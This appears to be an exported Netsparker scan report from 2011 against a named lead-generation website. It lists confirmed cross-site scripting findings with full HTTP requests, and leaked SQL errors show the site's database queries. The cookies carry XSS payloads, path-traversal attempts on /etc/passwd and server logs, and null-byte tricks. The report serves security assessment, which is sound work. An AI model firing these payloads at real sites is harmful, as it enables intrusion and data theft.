select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc='"--></style></script><script>netsparker(0x00058E)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00058E)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E

/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x00058B)</script>

Request

GET /ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00058B)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nguqsj82l635jj5v83u9jetqn3; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php'"--></style></script><script>netsparker(0x00058B)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00058B)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/

/ppc/leadflow/phsy00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/?'"--></style></script><script>alert(0x000578)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000578)</script>

Request

GET /ppc/leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q8gt4lsalerlpt2e139jqqh580; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>' OR prj.project_page_url = 'leadflow/phsy00/?'"--></style></script><script>netsparker(0x000578)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000578)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E

/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00058D)</script>

Request

GET /ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00058D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 